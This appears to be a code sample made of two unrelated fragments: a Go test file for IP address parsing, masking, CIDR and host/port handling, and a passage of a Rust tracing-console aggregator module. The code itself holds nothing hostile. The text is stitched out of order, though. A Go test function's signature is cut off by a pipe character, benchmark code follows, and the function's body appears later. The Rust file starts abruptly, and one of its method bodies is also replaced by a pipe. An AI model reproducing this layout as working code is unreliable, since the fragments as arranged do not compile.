} else if !testing.Short() {
// We can't control what the host resolver does; if it can resolve, say,
// 127.0.0.256 or fe80::1%911 or a host named 'abc', who are we to judge?
// Warn about these discrepancies but don't fail the test.
addrs, err := LookupHost(tt.in)
if err == nil {
t.Logf("warning: LookupHost(%q) = %v, want error", tt.in, addrs)
}
}
if tt.out != nil {
ips, err := LookupIP(tt.in)
if len(ips) != 1 || !reflect.DeepEqual(ips[0], tt.out) || err != nil {
t.Errorf("LookupIP(%q) = %v, %v, want %v, nil", tt.in, ips, err, []IP{tt.out})
}
} else if !testing.Short() {
ips, err := LookupIP(tt.in)
// We can't control what the host resolver does. See above.
if err == nil {
t.Logf("warning: LookupIP(%q) = %v, want error", tt.in, ips)
}
}
}
}
func BenchmarkParseIP(b *testing.B) {
testHookUninstaller.Do(uninstallTestHooks)
for i := 0; i < b.N; i++ {
for _, tt := range parseIPTests {
ParseIP(tt.in)
}
}
}
// Issue 6339
func TestMarshalEmptyIP(t *testing.T) {
for _, in := range [][]byte{nil, []byte("")} {
var out = IP{1, 2, 3, 4}
if err := out.UnmarshalText(in); err != nil || out != nil {
t.Errorf("UnmarshalText(%v) = %v, %v; want nil, nil", in, out, err)
}
}
var ip IP
got, err := ip.MarshalText()
if err != nil {
t.Fatal(err)
}
if !reflect.DeepEqual(got, []byte("")) {
t.Errorf(`got %#v, want []byte("")`, got)
}
}
var ipStringTests = []struct {
in IP // see RFC 791 and RFC 4291
str string // see RFC 791, RFC 4291 and RFC 5952
byt []byte
error
}{
// IPv4 address
{
IP{192, 0, 2, 1},
"192.0.2.1",
[]byte("192.0.2.1"),
nil,
},
{
IP{0, 0, 0, 0},
"0.0.0.0",
[]byte("0.0.0.0"),
nil,
},
// IPv4-mapped IPv6 address
{
IP{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 0, 2, 1},
"192.0.2.1",
[]byte("192.0.2.1"),
nil,
},
{
IP{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 0, 0, 0, 0},
"0.0.0.0",
[]byte("0.0.0.0"),
nil,
},
// IPv6 address
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0, 0x1, 0x23, 0, 0x12, 0, 0x1},
"2001:db8::123:12:1",
[]byte("2001:db8::123:12:1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x1},
"2001:db8::1",
[]byte("2001:db8::1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0x1, 0, 0, 0, 0x1, 0, 0, 0, 0x1},
"2001:db8:0:1:0:1:0:1",
[]byte("2001:db8:0:1:0:1:0:1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0x1, 0, 0, 0, 0x1, 0, 0, 0, 0x1, 0, 0},
"2001:db8:1:0:1:0:1:0",
[]byte("2001:db8:1:0:1:0:1:0"),
nil,
},
{
IP{0x20, 0x1, 0, 0, 0, 0, 0, 0, 0, 0x1, 0, 0, 0, 0, 0, 0x1},
"2001::1:0:0:1",
[]byte("2001::1:0:0:1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0x1, 0, 0, 0, 0, 0, 0},
"2001:db8:0:0:1::",
[]byte("2001:db8:0:0:1::"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0x1, 0, 0, 0, 0, 0, 0x1},
"2001:db8::1:0:0:1",
[]byte("2001:db8::1:0:0:1"),
nil,
},
{
IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0xa, 0, 0xb, 0, 0xc, 0, 0xd},
"2001:db8::a:b:c:d",
[]byte("2001:db8::a:b:c:d"),
nil,
},
{
IPv6unspecified,
"::",
[]byte("::"),
nil,
},
// IP wildcard equivalent address in Dial/Listen API
{
nil,
"<nil>",
nil,
nil,
},
// Opaque byte sequence
{
IP{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef},
"?0123456789abcdef",
nil,
&AddrError{Err: "invalid IP address", Addr: "0123456789abcdef"},
},
}
func TestIPString(t *testing.T) {
for _, tt := range ipStringTests {
if out := tt.in.String(); out != tt.str {
t.Errorf("IP.String(%v) = %q, want %q", tt.in, out, tt.str)
}
if out, err := tt.in.MarshalText(); !bytes.Equal(out, tt.byt) || !reflect.DeepEqual(err, tt.error) {
t.Errorf("IP.MarshalText(%v) = %v, %v, want %v, %v", tt.in, out, err, tt.byt, tt.error)
}
}
}
var sink string
func BenchmarkIPString(b *testing.B) {
testHookUninstaller.Do(uninstallTestHooks)
for i := 0; i < b.N; i++ {
for _, tt := range ipStringTests {
if tt.in != nil {
sink = tt.in.String()
}
}
}
}
var ipMaskTests = []struct {
in IP
mask IPMask
out IP
}{
{IPv4(192, 168, 1, 127), IPv4Mask(255, 255, 255, 128), IPv4(192, 168, 1, 0)},
{IPv4(192, 168, 1, 127), IPMask(ParseIP("255.255.255.192")), IPv4(192, 168, 1, 64)},
{IPv4(192, 168, 1, 127), IPMask(ParseIP("ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffe0")), IPv4(192, 168, 1, 96)},
{IPv4(192, 168, 1, 127), IPv4Mask(255, 0, 255, 0), IPv4(192, 0, 1, 0)},
{ParseIP("2001:db8::1"), IPMask(ParseIP("ffff:ff80::")), ParseIP("2001:d80::")},
{ParseIP("2001:db8::1"), IPMask(ParseIP("f0f0:0f0f::")), ParseIP("2000:d08::")},
}
func TestIPMask(t *testing.T) {
for _, tt := range ipMaskTests {
if out := tt.in.Mask(tt.mask); out == nil || !tt.out.Equal(out) {
t.Errorf("IP(%v).Mask(%v) = %v, want %v", tt.in, tt.mask, out, tt.out)
}
}
}
var ipMaskStringTests = []struct {
in IPMask
out string
}{
{IPv4Mask(255, 255, 255, 240), "fffffff0"},
{IPv4Mask(255, 0, 128, 0), "ff008000"},
{IPMask(ParseIP("ffff:ff80::")), "ffffff80000000000000000000000000"},
{IPMask(ParseIP("ef00:ff80::cafe:0")), "ef00ff800000000000000000cafe0000"},
{nil, "<nil>"},
}
func TestIPMaskString(t *testing.T) {
for _, tt := range ipMaskStringTests {
if out := tt.in.String(); out != tt.out {
t.Errorf("IPMask.String(%v) = %q, want %q", tt.in, out, tt.out)
}
}
}
func BenchmarkIPMaskString(b *testing.B) {
testHookUninstaller.Do(uninstallTestHooks)
for i := 0; i < b.N; i++ {
for _, tt := range ipMaskStringTests {
sink = tt.in.String()
}
}
}
var parseCIDRTests = []struct {
in string
ip IP
net *IPNet
err error
}{
{"135.104.0.0/32", IPv4(135, 104, 0, 0), &IPNet{IP: IPv4(135, 104, 0, 0), Mask: IPv4Mask(255, 255, 255, 255)}, nil},
{"0.0.0.0/24", IPv4(0, 0, 0, 0), &IPNet{IP: IPv4(0, 0, 0, 0), Mask: IPv4Mask(255, 255, 255, 0)}, nil},
{"135.104.0.0/24", IPv4(135, 104, 0, 0), &IPNet{IP: IPv4(135, 104, 0, 0), Mask: IPv4Mask(255, 255, 255, 0)}, nil},
{"135.104.0.1/32", IPv4(135, 104, 0, 1), &IPNet{IP: IPv4(135, 104, 0, 1), Mask: IPv4Mask(255, 255, 255, 255)}, nil},
{"135.104.0.1/24", IPv4(135, 104, 0, 1), &IPNet{IP: IPv4(135, 104, 0, 0), Mask: IPv4Mask(255, 255, 255, 0)}, nil},
{"::1/128", ParseIP("::1"), &IPNet{IP: ParseIP("::1"), Mask: IPMask(ParseIP("ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff"))}, nil},
{"abcd:2345::/127", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:ffff:ffff:ffff:ffff:ffff:fffe"))}, nil},
{"abcd:2345::/65", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:ffff:ffff:8000::"))}, nil},
{"abcd:2345::/64", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:ffff:ffff::"))}, nil},
{"abcd:2345::/63", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:ffff:fffe::"))}, nil},
{"abcd:2345::/33", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff:8000::"))}, nil},
{"abcd:2345::/32", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2345::"), Mask: IPMask(ParseIP("ffff:ffff::"))}, nil},
{"abcd:2344::/31", ParseIP("abcd:2344::"), &IPNet{IP: ParseIP("abcd:2344::"), Mask: IPMask(ParseIP("ffff:fffe::"))}, nil},
{"abcd:2300::/24", ParseIP("abcd:2300::"), &IPNet{IP: ParseIP("abcd:2300::"), Mask: IPMask(ParseIP("ffff:ff00::"))}, nil},
{"abcd:2345::/24", ParseIP("abcd:2345::"), &IPNet{IP: ParseIP("abcd:2300::"), Mask: IPMask(ParseIP("ffff:ff00::"))}, nil},
{"2001:DB8::/48", ParseIP("2001:DB8::"), &IPNet{IP: ParseIP("2001:DB8::"), Mask: IPMask(ParseIP("ffff:ffff:ffff::"))}, nil},
{"2001:DB8::1/48", ParseIP("2001:DB8::1"), &IPNet{IP: ParseIP("2001:DB8::"), Mask: IPMask(ParseIP("ffff:ffff:ffff::"))}, nil},
{"192.168.1.1/255.255.255.0", nil, nil, &ParseError{Type: "CIDR address", Text: "192.168.1.1/255.255.255.0"}},
{"192.168.1.1/35", nil, nil, &ParseError{Type: "CIDR address", Text: "192.168.1.1/35"}},
{"2001:db8::1/-1", nil, nil, &ParseError{Type: "CIDR address", Text: "2001:db8::1/-1"}},
{"2001:db8::1/-0", nil, nil, &ParseError{Type: "CIDR address", Text: "2001:db8::1/-0"}},
{"-0.0.0.0/32", nil, nil, &ParseError{Type: "CIDR address", Text: "-0.0.0.0/32"}},
{"0.-1.0.0/32", nil, nil, &ParseError{Type: "CIDR address", Text: "0.-1.0.0/32"}},
{"0.0.-2.0/32", nil, nil, &ParseError{Type: "CIDR address", Text: "0.0.-2.0/32"}},
{"0.0.0.-3/32", nil, nil, &ParseError{Type: "CIDR address", Text: "0.0.0.-3/32"}},
{"0.0.0.0/-0", nil, nil, &ParseError{Type: "CIDR address", Text: "0.0.0.0/-0"}},
{"", nil, nil, &ParseError{Type: "CIDR address", Text: ""}},
}
func TestParseCIDR(t *testing.T) {
for _, tt := range parseCIDRTests {
ip, net, err := ParseCIDR(tt.in)
if !reflect.DeepEqual(err, tt.err) {
t.Errorf("ParseCIDR(%q) = %v, %v; want %v, %v", tt.in, ip, net, tt.ip, tt.net)
}
if err == nil && (!tt.ip.Equal(ip) || !tt.net.IP.Equal(net.IP) || !reflect.DeepEqual(net.Mask, tt.net.Mask)) {
t.Errorf("ParseCIDR(%q) = %v, {%v, %v}; want %v, {%v, %v}", tt.in, ip, net.IP, net.Mask, tt.ip, tt.net.IP, tt.net.Mask)
}
}
}
var ipNetContainsTests = []struct {
ip IP
net *IPNet
ok bool
}{
{IPv4(172, 16, 1, 1), &IPNet{IP: IPv4(172, 16, 0, 0), Mask: CIDRMask(12, 32)}, true},
{IPv4(172, 24, 0, 1), &IPNet{IP: IPv4(172, 16, 0, 0), Mask: CIDRMask(13, 32)}, false},
{IPv4(192, 168, 0, 3), &IPNet{IP: IPv4(192, 168, 0, 0), Mask: IPv4Mask(0, 0, 255, 252)}, true},
{IPv4(192, 168, 0, 4), &IPNet{IP: IPv4(192, 168, 0, 0), Mask: IPv4Mask(0, 255, 0, 252)}, false},
{ParseIP("2001:db8:1:2::1"), &IPNet{IP: ParseIP("2001:db8:1::"), Mask: CIDRMask(47, 128)}, true},
{ParseIP("2001:db8:1:2::1"), &IPNet{IP: ParseIP("2001:db8:2::"), Mask: CIDRMask(47, 128)}, false},
{ParseIP("2001:db8:1:2::1"), &IPNet{IP: ParseIP("2001:db8:1::"), Mask: IPMask(ParseIP("ffff:0:ffff::"))}, true},
{ParseIP("2001:db8:1:2::1"), &IPNet{IP: ParseIP("2001:db8:1::"), Mask: IPMask(ParseIP("0:0:0:ffff::"))}, false},
}
func TestIPNetContains(t *testing.T) {
for _, tt := range ipNetContainsTests {
if ok := tt.net.Contains(tt.ip); ok != tt.ok {
t.Errorf("IPNet(%v).Contains(%v) = %v, want %v", tt.net, tt.ip, ok, tt.ok)
}
}
}
var ipNetStringTests = []struct {
in *IPNet
out string
}{
{&IPNet{IP: IPv4(192, 168, 1, 0), Mask: CIDRMask(26, 32)}, "192.168.1.0/26"},
{&IPNet{IP: IPv4(192, 168, 1, 0), Mask: IPv4Mask(255, 0, 255, 0)}, "192.168.1.0/ff00ff00"},
{&IPNet{IP: ParseIP("2001:db8::"), Mask: CIDRMask(55, 128)}, "2001:db8::/55"},
{&IPNet{IP: ParseIP("2001:db8::"), Mask: IPMask(ParseIP("8000:f123:0:cafe::"))}, "2001:db8::/8000f1230000cafe0000000000000000"},
}
func TestIPNetString(t *testing.T) {
for _, tt := range ipNetStringTests {
if out := tt.in.String(); out != tt.out {
t.Errorf("IPNet.String(%v) = %q, want %q", tt.in, out, tt.out)
}
}
}
var cidrMaskTests = []struct {
ones int
bits int
out IPMask
}{
{0, 32, IPv4Mask(0, 0, 0, 0)},
{12, 32, IPv4Mask(255, 240, 0, 0)},
{24, 32, IPv4Mask(255, 255, 255, 0)},
{32, 32, IPv4Mask(255, 255, 255, 255)},
{0, 128, IPMask{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}},
{4, 128, IPMask{0xf0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}},
{48, 128, IPMask{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}},
{128, 128, IPMask{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}},
{33, 32, nil},
{32, 33, nil},
{-1, 128, nil},
{128, -1, nil},
}
func TestCIDRMask(t *testing.T) {
for _, tt := range cidrMaskTests {
if out := CIDRMask(tt.ones, tt.bits); !reflect.DeepEqual(out, tt.out) {
t.Errorf("CIDRMask(%v, %v) = %v, want %v", tt.ones, tt.bits, out, tt.out)
}
}
}
var (
v4addr = IP{192, 168, 0, 1}
v4mappedv6addr = IP{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1}
v6addr = IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0, 0x1, 0x23, 0, 0x12, 0, 0x1}
v4mask = IPMask{255, 255, 255, 0}
v4mappedv6mask = IPMask{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 255, 255, 255, 0}
v6mask = IPMask{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0, 0, 0, 0, 0, 0, 0, 0}
badaddr = IP{192, 168, 0}
badmask = IPMask{255, 255, 0}
v4maskzero = IPMask{0, 0, 0, 0}
)
var networkNumberAndMaskTests = []struct {
in IPNet
out IPNet
}{
{IPNet{IP: v4addr, Mask: v4mask}, IPNet{IP: v4addr, Mask: v4mask}},
{IPNet{IP: v4addr, Mask: v4mappedv6mask}, IPNet{IP: v4addr, Mask: v4mask}},
{IPNet{IP: v4mappedv6addr, Mask: v4mappedv6mask}, IPNet{IP: v4addr, Mask: v4mask}},
{IPNet{IP: v4mappedv6addr, Mask: v6mask}, IPNet{IP: v4addr, Mask: v4maskzero}},
{IPNet{IP: v4addr, Mask: v6mask}, IPNet{IP: v4addr, Mask: v4maskzero}},
{IPNet{IP: v6addr, Mask: v6mask}, IPNet{IP: v6addr, Mask: v6mask}},
{IPNet{IP: v6addr, Mask: v4mappedv6mask}, IPNet{IP: v6addr, Mask: v4mappedv6mask}},
{in: IPNet{IP: v6addr, Mask: v4mask}},
{in: IPNet{IP: v4addr, Mask: badmask}},
{in: IPNet{IP: v4mappedv6addr, Mask: badmask}},
{in: IPNet{IP: v6addr, Mask: badmask}},
{in: IPNet{IP: badaddr, Mask: v4mask}},
{in: IPNet{IP: badaddr, Mask: v4mappedv6mask}},
{in: IPNet{IP: badaddr, Mask: v6mask}},
{in: IPNet{IP: badaddr, Mask: badmask}},
}
func TestNetworkNumberAndMask(t *testing.T) {
for _, tt := range networkNumberAndMaskTests {
ip, m := networkNumberAndMask(&tt.in)
out := &IPNet{IP: ip, Mask: m}
if !reflect.DeepEqual(&tt.out, out) {
t.Errorf("networkNumberAndMask(%v) = %v, want %v", tt.in, out, &tt.out)
}
}
}
var splitJoinTests = []struct {
host string
port string
join string
}{
{"www.google.com", "80", "www.google.com:80"},
{"127.0.0.1", "1234", "127.0.0.1:1234"},
{"::1", "80", "[::1]:80"},
{"fe80::1%lo0", "80", "[fe80::1%lo0]:80"},
{"localhost%lo0", "80", "[localhost%lo0]:80"},
{"", "0", ":0"},
{"google.com", "https%foo", "google.com:https%foo"}, // Go 1.0 behavior
{"127.0.0.1", "", "127.0.0.1:"}, // Go 1.0 behavior
{"www.google.com", "", "www.google.com:"}, // Go 1.0 behavior
}
var splitFailureTests = []struct {
hostPort string
err string
}{
{"www.google.com", "missing port in address"},
{"127.0.0.1", "missing port in address"},
{"[::1]", "missing port in address"},
{"[fe80::1%lo0]", "missing port in address"},
{"[localhost%lo0]", "missing port in address"},
{"localhost%lo0", "missing port in address"},
{"::1", "too many colons in address"},
{"fe80::1%lo0", "too many colons in address"},
{"fe80::1%lo0:80", "too many colons in address"},
{"localhost%lo0:80", "missing brackets in address"},
// Test cases that didn't fail in Go 1.0
{"[foo:bar]", "missing port in address"},
{"[foo:bar]baz", "missing port in address"},
{"[foo]bar:baz", "missing port in address"},
{"[foo]:[bar]:baz", "too many colons in address"},
{"[foo]:[bar]baz", "unexpected '[' in address"},
{"foo[bar]:baz", "unexpected '[' in address"},
{"foo]bar:baz", "unexpected ']' in address"},
}
func TestSplitHostPort(t *testing.T) {
for _, tt := range splitJoinTests {
if host, port, err := SplitHostPort(tt.join); host != tt.host || port != tt.port || err != nil {
t.Errorf("SplitHostPort(%q) = %q, %q, %v; want %q, %q, nil", tt.join, host, port, err, tt.host, tt.port)
}
}
for _, tt := range splitFailureTests {
if host, port, err := SplitHostPort(tt.hostPort); err == nil {
t.Errorf("SplitHostPort(%q) should have failed", tt.hostPort)
} else {
e := err.(*AddrError)
if e.Err != tt.err {
t.Errorf("SplitHostPort(%q) = _, _, %q; want %q", tt.hostPort, e.Err, tt.err)
}
if host != "" || port != "" {
t.Errorf("SplitHostPort(%q) = %q, %q, err; want %q, %q, err on failure", tt.hostPort, host, port, "", "")
}
}
}
}
func TestJoinHostPort(t *testing.T) {
for _, tt := range splitJoinTests {
if join := JoinHostPort(tt.host, tt.port); join != tt.join {
t.Errorf("JoinHostPort(%q, %q) = %q; want %q", tt.host, tt.port, join, tt.join)
}
}
}
var ipAddrFamilyTests = []struct {
in IP
af4 bool
af6 bool
}{
{IPv4bcast, true, false},
{IPv4allsys, true, false},
{IPv4allrouter, true, false},
{IPv4zero, true, false},
{IPv4(224, 0, 0, 1), true, false},
{IPv4(127, 0, 0, 1), true, false},
{IPv4(240, 0, 0, 1), true, false},
{IPv6unspecified, false, true},
{IPv6loopback, false, true},
{IPv6interfacelocalallnodes, false, true},
{IPv6linklocalallnodes, false, true},
{IPv6linklocalallrouters, false, true},
{ParseIP("ff05::a:b:c:d"), false, true},
{ParseIP("fe80::1:2:3:4"), false, true},
{ParseIP("2001:db8::123:12:1"), false, true},
}
func TestIPAddrFamily(t *testing.T) {
for _, tt := range ipAddrFamilyTests {
if af := tt.in.To4() != nil; af != tt.af4 {
t.Errorf("verifying IPv4 address family for %q = %v, want %v", tt.in, af, tt.af4)
}
if af := len(tt.in) == IPv6len && tt.in.To4() == nil; af != tt.af6 {
t.Errorf("verifying IPv6 address family for %q = %v, want %v", tt.in, af, tt.af6)
}
}
}
var ipAddrScopeTests = []struct {
scope func(IP) bool
in IP
ok bool
}{
{IP.IsUnspecified, IPv4zero, true},
{IP.IsUnspecified, IPv4(127, 0, 0, 1), false},
{IP.IsUnspecified, IPv6unspecified, true},
{IP.IsUnspecified, IPv6interfacelocalallnodes, false},
{IP.IsUnspecified, nil, false},
{IP.IsLoopback, IPv4(127, 0, 0, 1), true},
{IP.IsLoopback, IPv4(127, 255, 255, 254), true},
{IP.IsLoopback, IPv4(128, 1, 2, 3), false},
{IP.IsLoopback, IPv6loopback, true},
{IP.IsLoopback, IPv6linklocalallrouters, false},
{IP.IsLoopback, nil, false},
{IP.IsMulticast, IPv4(224, 0, 0, 0), true},
{IP.IsMulticast, IPv4(239, 0, 0, 0), true},
{IP.IsMulticast, IPv4(240, 0, 0, 0), false},
{IP.IsMulticast, IPv6linklocalallnodes, true},
{IP.IsMulticast, IP{0xff, 0x05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, true},
{IP.IsMulticast, IP{0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsMulticast, nil, false},
{IP.IsInterfaceLocalMulticast, IPv4(224, 0, 0, 0), false},
{IP.IsInterfaceLocalMulticast, IPv4(0xff, 0x01, 0, 0), false},
{IP.IsInterfaceLocalMulticast, IPv6interfacelocalallnodes, true},
{IP.IsInterfaceLocalMulticast, nil, false},
{IP.IsLinkLocalMulticast, IPv4(224, 0, 0, 0), true},
{IP.IsLinkLocalMulticast, IPv4(239, 0, 0, 0), false},
{IP.IsLinkLocalMulticast, IPv4(0xff, 0x02, 0, 0), false},
{IP.IsLinkLocalMulticast, IPv6linklocalallrouters, true},
{IP.IsLinkLocalMulticast, IP{0xff, 0x05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsLinkLocalMulticast, nil, false},
{IP.IsLinkLocalUnicast, IPv4(169, 254, 0, 0), true},
{IP.IsLinkLocalUnicast, IPv4(169, 255, 0, 0), false},
{IP.IsLinkLocalUnicast, IPv4(0xfe, 0x80, 0, 0), false},
{IP.IsLinkLocalUnicast, IP{0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, true},
{IP.IsLinkLocalUnicast, IP{0xfe, 0xc0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsLinkLocalUnicast, nil, false},
{IP.IsGlobalUnicast, IPv4(240, 0, 0, 0), true},
{IP.IsGlobalUnicast, IPv4(232, 0, 0, 0), false},
{IP.IsGlobalUnicast, IPv4(169, 254, 0, 0), false},
{IP.IsGlobalUnicast, IPv4bcast, false},
{IP.IsGlobalUnicast, IP{0x20, 0x1, 0xd, 0xb8, 0, 0, 0, 0, 0, 0, 0x1, 0x23, 0, 0x12, 0, 0x1}, true},
{IP.IsGlobalUnicast, IP{0xfe, 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsGlobalUnicast, IP{0xff, 0x05, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}, false},
{IP.IsGlobalUnicast, nil, false},
}
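// name returns the fully qualified name of the function f, used to label
// scope predicates in test failure messages.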
func name(f interface{}) string {
return runtime.FuncForPC(reflect.ValueOf(f).Pointer()).Name()
}
func TestIPAddrScope(t *testing.T) |
func BenchmarkIPEqual(b *testing.B) {
b.Run("IPv4", func(b *testing.B) {
benchmarkIPEqual(b, IPv4len)
})
b.Run("IPv6", func(b *testing.B) {
benchmarkIPEqual(b, IPv6len)
})
}
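// benchmarkIPEqual exercises IP.Equal on a pool of random addresses of the
// given byte length.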
func benchmarkIPEqual(b *testing.B, size int) {
ips := make([]IP, 1000)
for i := range ips {
ips[i] = make(IP, size)
rand.Read(ips[i])
}
// Half of the N are equal.
for i := 0; i < b.N/2; i++ {
x := ips[i%len(ips)]
y := ips[i%len(ips)]
x.Equal(y)
}
// The other half are not equal.
for i := 0; i < b.N/2; i++ {
x := ips[i%len(ips)]
y := ips[(i+1)%len(ips)]
x.Equal(y)
}
}
| {
for _, tt := range ipAddrScopeTests {
if ok := tt.scope(tt.in); ok != tt.ok {
t.Errorf("%s(%q) = %v, want %v", name(tt.scope), tt.in, ok, tt.ok)
}
ip := tt.in.To4()
if ip == nil {
continue
}
if ok := tt.scope(ip); ok != tt.ok {
t.Errorf("%s(%q) = %v, want %v", name(tt.scope), ip, ok, tt.ok)
}
}
} |
mod.rs | use super::{AttributeUpdate, AttributeUpdateOp, Command, Event, WakeOp, Watch};
use crate::{record::Recorder, WatchRequest};
use console_api as proto;
use proto::resources::resource;
use proto::resources::stats::Attribute;
use tokio::sync::{mpsc, Notify};
use futures::FutureExt;
use std::{
collections::{hash_map::Entry, HashMap, HashSet},
convert::TryInto,
sync::{
atomic::{AtomicBool, Ordering::*},
Arc,
},
time::{Duration, SystemTime},
};
use tracing_core::{span, Metadata};
use hdrhistogram::{
serialization::{Serializer, V2SerializeError, V2Serializer},
Histogram,
};
pub type Id = u64;
mod id_data;
mod shrink;
use self::id_data::{IdData, Include};
use self::shrink::{ShrinkMap, ShrinkVec};
pub(crate) struct Aggregator {
/// Channel of incoming events emitted by `TaskLayer`s.
events: mpsc::Receiver<Event>,
/// New incoming RPCs.
rpcs: mpsc::Receiver<Command>,
/// The interval at which new data updates are pushed to clients.
publish_interval: Duration,
/// How long to keep task data after a task has completed.
retention: Duration,
/// Triggers a flush when the event buffer is approaching capacity.
flush_capacity: Arc<Flush>,
/// Currently active RPCs streaming task events.
watchers: ShrinkVec<Watch<proto::instrument::Update>>,
/// Currently active RPCs streaming task details events, by task ID.
details_watchers: ShrinkMap<Id, Vec<Watch<proto::tasks::TaskDetails>>>,
/// *All* metadata for task spans and user-defined spans that we care about.
///
/// This is sent to new clients as part of the initial state.
all_metadata: ShrinkVec<proto::register_metadata::NewMetadata>,
/// *New* metadata that was registered since the last state update.
///
/// This is emptied on every state update.
new_metadata: Vec<proto::register_metadata::NewMetadata>,
/// Map of task IDs to task static data.
tasks: IdData<Task>,
/// Map of task IDs to task stats.
task_stats: IdData<TaskStats>,
/// Map of resource IDs to resource static data.
resources: IdData<Resource>,
/// Map of resource IDs to resource stats.
resource_stats: IdData<ResourceStats>,
/// Map of AsyncOp IDs to AsyncOp static data.
async_ops: IdData<AsyncOp>,
/// Map of AsyncOp IDs to AsyncOp stats.
async_op_stats: IdData<AsyncOpStats>,
/// *All* PollOp events for AsyncOps on Resources.
///
/// This is sent to new clients as part of the initial state.
// TODO: drop the poll ops for async ops that have been dropped
all_poll_ops: ShrinkVec<proto::resources::PollOp>,
/// *New* PollOp events that have occurred since the last update.
///
/// This is emptied on every state update.
new_poll_ops: Vec<proto::resources::PollOp>,
ids: Ids,
/// A sink to record all events to a file.
recorder: Option<Recorder>,
/// The time "state" of the aggregator, such as paused or live.
temporality: Temporality,
}
#[derive(Debug)]
pub(crate) struct Flush {
pub(crate) should_flush: Notify,
triggered: AtomicBool,
}
// An entity (e.g. a task or resource) that can be dropped at some point in
// time. This generally refers to spans that have been closed, indicating
// that a task, async op, or resource is no longer in use.
pub(crate) trait DroppedAt {
fn dropped_at(&self) -> Option<SystemTime>;
}
pub(crate) trait ToProto {
type Output;
fn to_proto(&self) -> Self::Output;
}
#[derive(Debug, Default)]
pub(crate) struct Ids {
/// A counter for the pretty task IDs.
next: Id,
/// A table that contains the span ID to pretty ID mappings.
id_mappings: ShrinkMap<span::Id, Id>,
}
#[derive(Debug)]
enum Temporality {
Live,
Paused,
}
#[derive(Default)]
struct PollStats {
/// The number of polls in progress
current_polls: u64,
/// The total number of polls
polls: u64,
first_poll: Option<SystemTime>,
last_poll_started: Option<SystemTime>,
last_poll_ended: Option<SystemTime>,
busy_time: Duration,
}
// Represents static data for resources
struct Resource {
id: Id,
metadata: &'static Metadata<'static>,
concrete_type: String,
kind: resource::Kind,
location: Option<proto::Location>,
}
/// Represents a key for a `proto::field::Name`. Because a
/// `proto::field::Name` might not be unique, we also include the
/// resource ID in this key.
#[derive(Hash, PartialEq, Eq)]
struct FieldKey {
resource_id: u64,
field_name: proto::field::Name,
}
#[derive(Default)]
struct ResourceStats {
created_at: Option<SystemTime>,
dropped_at: Option<SystemTime>,
attributes: HashMap<FieldKey, Attribute>,
}
/// Represents static data for tasks
struct Task {
id: Id,
metadata: &'static Metadata<'static>,
fields: Vec<proto::Field>,
location: Option<proto::Location>,
}
struct TaskStats {
// task stats
created_at: Option<SystemTime>,
dropped_at: Option<SystemTime>,
// waker stats
wakes: u64,
waker_clones: u64,
waker_drops: u64,
self_wakes: u64,
last_wake: Option<SystemTime>,
poll_times_histogram: Histogram<u64>,
poll_stats: PollStats,
}
struct AsyncOp {
id: Id,
metadata: &'static Metadata<'static>,
source: String,
}
#[derive(Default)]
struct AsyncOpStats {
created_at: Option<SystemTime>,
dropped_at: Option<SystemTime>,
resource_id: Option<Id>,
task_id: Option<Id>,
poll_stats: PollStats,
}
impl DroppedAt for ResourceStats {
fn dropped_at(&self) -> Option<SystemTime> |
}
impl DroppedAt for TaskStats {
fn dropped_at(&self) -> Option<SystemTime> {
self.dropped_at
}
}
impl DroppedAt for AsyncOpStats {
fn dropped_at(&self) -> Option<SystemTime> {
self.dropped_at
}
}
impl PollStats {
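/// Records a span enter. Only the outermost enter starts a new poll, so
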